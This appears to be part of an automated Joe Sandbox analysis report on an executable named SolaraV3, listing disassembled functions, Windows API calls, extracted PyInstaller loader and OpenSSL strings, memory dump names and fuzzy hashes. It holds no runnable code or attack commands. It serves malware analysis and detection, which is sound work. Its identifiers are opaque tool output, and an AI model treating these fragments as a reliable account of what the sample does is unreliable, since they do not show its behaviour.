Instruction Fuzzy Hash: 1CC17AE1A0A74691EA20EB31E444EB96355AF45BC0F84C436EA4F977F6EF3CE6458700

Function 00007FF6DC7081D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6DC709390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6DC7045F4,00000000,00007FF6DC701985), ref: 00007FF6DC7093C9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF6DC7086B7,?,?,00000000,00007FF6DC703CBB), ref: 00007FF6DC70822C

Part of subcall function 00007FF6DC702810: MessageBoxW.USER32 ref: 00007FF6DC7028EA

Strings

LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6DC708203
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF6DC708373
\, xrefs: 00007FF6DC708261
CreateDirectory, xrefs: 00007FF6DC70837C
%.*s, xrefs: 00007FF6DC70830C
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6DC708240
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF6DC70829D
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6DC7082D9

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: d247d3a0ca85f1815ed913d402e51827366718a31552b00c9fe28dde0a2555e6
Instruction ID: 2eb6479a9e5064bf511a11b16d31ba874cc6cf6a2ae0b124b8b744b0db849820
Opcode Fuzzy Hash: d247d3a0ca85f1815ed913d402e51827366718a31552b00c9fe28dde0a2555e6
Instruction Fuzzy Hash: 6351D711B2DA4A81FB619B26D8612FEA270EF94780F444537DA4EC26D5EE3DE027D700

Function 00007FF6DC701600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6DC7017CA
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6DC7016A2
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6DC7017DF
Failed to create symbolic link %s!, xrefs: 00007FF6DC701622
fseek, xrefs: 00007FF6DC7016E1
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6DC7016DA
fwrite, xrefs: 00007FF6DC7017D1
fread, xrefs: 00007FF6DC7017E6
fopen, xrefs: 00007FF6DC701663
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF6DC701742
Failed to extract %s: failed to open target file!, xrefs: 00007FF6DC70165C
malloc, xrefs: 00007FF6DC701749

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: 0fc354e652d922baf25649c05fff9f135636940cc1903e51c7693d6e7560eb62
Instruction ID: f6a25d392880169f459ce35b928d1bf17b9a9d6a19c3ce52619e96d98dceac57
Opcode Fuzzy Hash: 0fc354e652d922baf25649c05fff9f135636940cc1903e51c7693d6e7560eb62
Instruction Fuzzy Hash: AD51AE21B0864F86EA20AB2694201BD63A0BF44794F444533EE4DC77DADE3DF567E340

Function 00007FFB0B814E44 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 205registryfileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FFB0B91F264
GetFileType.KERNEL32 ref: 00007FFB0B91F275
WriteFile.KERNEL32 ref: 00007FFB0B91F2D9
MultiByteToWideChar.KERNEL32 ref: 00007FFB0B91F346
RegisterEventSourceW.ADVAPI32 ref: 00007FFB0B91F4F4
ReportEventW.ADVAPI32 ref: 00007FFB0B91F536
DeregisterEventSource.ADVAPI32 ref: 00007FFB0B91F53F

Strings

OpenSSL, xrefs: 00007FFB0B91F4ED
no stack?, xrefs: 00007FFB0B91F32C
, xrefs: 00007FFB0B91F360
OpenSSL: FATAL, xrefs: 00007FFB0B91F54D

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite
String ID: $OpenSSL$OpenSSL: FATAL$no stack?
API String ID: 1270133462-2963566556
Opcode ID: 59a87a5942c62673d1eda9d489acfd17bfac18cd3cdeff8e5dabbfc5dde2d1c3
Instruction ID: 46a23746c32e68eb00e52ef6c3a3df55de9ad8d8467918c13bf3e70c12db20cb
Opcode Fuzzy Hash: 59a87a5942c62673d1eda9d489acfd17bfac18cd3cdeff8e5dabbfc5dde2d1c3
Instruction Fuzzy Hash: EF91D7B2A18B8686EB20CF34E854AB93764FB45794F408635EB5E97AB5EF38D145C300

Function 00007FFB0B8132B0 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 127COMMON

Download Yara Rule

APIs

00007FFB2ADA1370.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFB0BA0C31C
00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFB0BA0C331
00007FFB2ADA1370.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFB0BA0C343

Strings

accuracy, xrefs: 00007FFB0BA0C253, 00007FFB0BA0C2A3, 00007FFB0BA0C3F4
microsecs, xrefs: 00007FFB0BA0C34E
millisecs, xrefs: 00007FFB0BA0C327
p, xrefs: 00007FFB0BA0C3D4
secs, xrefs: 00007FFB0BA0C2ED
..\s\crypto\ts\ts_conf.c, xrefs: 00007FFB0BA0C290, 00007FFB0BA0C3DC

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: 00007$A1370$B5630
String ID: ..\s\crypto\ts\ts_conf.c$accuracy$microsecs$millisecs$p$secs
API String ID: 751195488-1596076588
Opcode ID: cc7c6589514fd3f94b54c26a0afcf694c1ba4532192f104d776a5ebc2ee4bbca
Instruction ID: 7d150ac9e08ff0523a85ea70c328309fc02a978adc4b27d1b0a3393935c2b04e
Opcode Fuzzy Hash: cc7c6589514fd3f94b54c26a0afcf694c1ba4532192f104d776a5ebc2ee4bbca
Instruction Fuzzy Hash: 3051ACA1A2D74392EE14AB76E400EB96394FF44B90F408A35DE4F87BB1EE3CE5058705

Function 00007FF6DC702180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6DC7021AB
SelectObject.GDI32 ref: 00007FF6DC7021F2
DrawTextW.USER32 ref: 00007FF6DC702215
SelectObject.GDI32 ref: 00007FF6DC70222B
ReleaseDC.USER32 ref: 00007FF6DC70223B
MoveWindow.USER32 ref: 00007FF6DC70228B
MoveWindow.USER32 ref: 00007FF6DC7022CB
MoveWindow.USER32 ref: 00007FF6DC70231E
MoveWindow.USER32 ref: 00007FF6DC702366

Strings

P%, xrefs: 00007FF6DC7021FF

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 6bb560890a1063760ff1b2432fb7f93ef47802c76cb82598edb2bfde7034b5c9
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 3351E736608BA186D6349F26E4581BEB7A1F798B61F004126EFDF83694DF3CD056DB10

Function 00007FF6DC7080C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF6DC7080FF
GetWindowLongPtrW.USER32 ref: 00007FF6DC70817F
ShutdownBlockReasonCreate.USER32 ref: 00007FF6DC708192
GetLastError.KERNEL32 ref: 00007FF6DC70819C
SetWindowLongPtrW.USER32 ref: 00007FF6DC7081B3

Strings

Needs to remove its temporary files., xrefs: 00007FF6DC708185

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction ID: 7c585f7a559c15c08ef608bd35c4c35b0554370b399aff796e7cc0c8dafb2a4d
Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction Fuzzy Hash: 7821A921B08A4AC5E7518B7AE85417DA260FF88BD0F584236DE2EC33D5DE2CD5729301

Function 00007FF6DC716290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7162D3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7166C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC71695C

Strings

p, xrefs: 00007FF6DC7163FD
p, xrefs: 00007FF6DC716385
:, xrefs: 00007FF6DC71648C
f, xrefs: 00007FF6DC7163F5
-, xrefs: 00007FF6DC716369

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 79a2cfecd9b28d38432b09fcbaf9c1260cb1a056df2b58ef13de02e89872d42e
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 0E12B572E0C24B86FB205E9DD1646BD76A2FB50750F886137E699876C4DF3CE5A2CB00

Function 00007FF6DC710FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC711008
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7113D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC71166F

Strings

f, xrefs: 00007FF6DC7110A0
f, xrefs: 00007FF6DC711255
p, xrefs: 00007FF6DC711112
p, xrefs: 00007FF6DC7110AD
f, xrefs: 00007FF6DC71110A

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 2eddba98cd7bd985834afa704490bf71776279aa41a4f794b1605193a7537f9c
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: AC12A661E1C58B87FB205E19E06427D76A5FB40754FD46033D69A8BAC8DF3CE5A2CB10

Function 00007FF6DC701050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF6DC701098
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6DC7011F6
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6DC701108
fseek, xrefs: 00007FF6DC7010D3
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6DC7010CC
fread, xrefs: 00007FF6DC7011FD
malloc, xrefs: 00007FF6DC70110F

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 57f1ba879e64d79a5510092389c3c74467e656c8a1e2ed55c690b7ea58e9778c
Instruction ID: 128a8c90c54ff631be9942f03b8e5c3482cad9073ef72b4757f9ec0ea8ccb4c3
Opcode Fuzzy Hash: 57f1ba879e64d79a5510092389c3c74467e656c8a1e2ed55c690b7ea58e9778c
Instruction Fuzzy Hash: 4641CE22B0865A86EA14DB17A8106BEA3A5FF44BC4F844433ED4DC778ADE3DE563D340

Function 00007FFB0B8141DD Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFB0B8DA54E
WSAGetLastError.WS2_32 ref: 00007FFB0B8DA558

Strings

..\s\crypto\bio\b_sock2.c, xrefs: 00007FFB0B8DA4DE, 00007FFB0B8DA56E, 00007FFB0B8DA58A, 00007FFB0B8DA5F3, 00007FFB0B8DA60F, 00007FFB0B8DA66B, 00007FFB0B8DA687
o, xrefs: 00007FFB0B8DA67F

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: ..\s\crypto\bio\b_sock2.c$o
API String ID: 1729277954-1872632005
Opcode ID: 0d2034ac39a1f015537a20df33351dbf74ae8a5fab91621d70cfd5eb938fd7c6
Instruction ID: 36f6288659c32e12c046aa5fdde57abc6716c90ca763e6212d70607082aed6d2
Opcode Fuzzy Hash: 0d2034ac39a1f015537a20df33351dbf74ae8a5fab91621d70cfd5eb938fd7c6
Instruction Fuzzy Hash: 06517CF1A08642C6F7249F71E805FA97360FB84744F548636E74A87AB9CF3DE5058B50

Function 00007FF6DC708660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF6DC703CBB), ref: 00007FF6DC708704
GetCurrentProcessId.KERNEL32(?,00000000,00007FF6DC703CBB), ref: 00007FF6DC70870A
CreateDirectoryW.KERNEL32(?,00000000,00007FF6DC703CBB), ref: 00007FF6DC70874C

Part of subcall function 00007FF6DC708830: GetEnvironmentVariableW.KERNEL32(00007FF6DC70388E), ref: 00007FF6DC708867
Part of subcall function 00007FF6DC708830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6DC708889

Part of subcall function 00007FF6DC718238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC718251

Part of subcall function 00007FF6DC702810: MessageBoxW.USER32 ref: 00007FF6DC7028EA

Strings

TMP, xrefs: 00007FF6DC7086C2
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF6DC70877E
LOADER: failed to set the TMP environment variable., xrefs: 00007FF6DC7086DC
_MEI%d, xrefs: 00007FF6DC708712
TMP, xrefs: 00007FF6DC70869C, 00007FF6DC7087A3

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 881e4fca8e19ec4ab2ebb52834f4ac375ff8f2bae867f31c8bf391ae1f14406c
Instruction ID: c3f9c04f3f87d20f91d7bb1442674cb1982467ea68f41431e2d5731548bdd16e
Opcode Fuzzy Hash: 881e4fca8e19ec4ab2ebb52834f4ac375ff8f2bae867f31c8bf391ae1f14406c
Instruction Fuzzy Hash: 6241C211B1964A44FA25E767A8652FD52A0AF887C0F845233ED0DC77DADE3DE523D700

Function 00007FFB0B8123D8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 94libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FFB0B91F088
GetProcAddress.KERNEL32 ref: 00007FFB0B91F09D
GetProcessWindowStation.USER32 ref: 00007FFB0B91F0C7
GetUserObjectInformationW.USER32 ref: 00007FFB0B91F0EF
GetLastError.KERNEL32 ref: 00007FFB0B91F0FD
GetUserObjectInformationW.USER32 ref: 00007FFB0B91F168

Strings

Service-0x, xrefs: 00007FFB0B91F189
_OPENSSL_isservice, xrefs: 00007FFB0B91F093

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
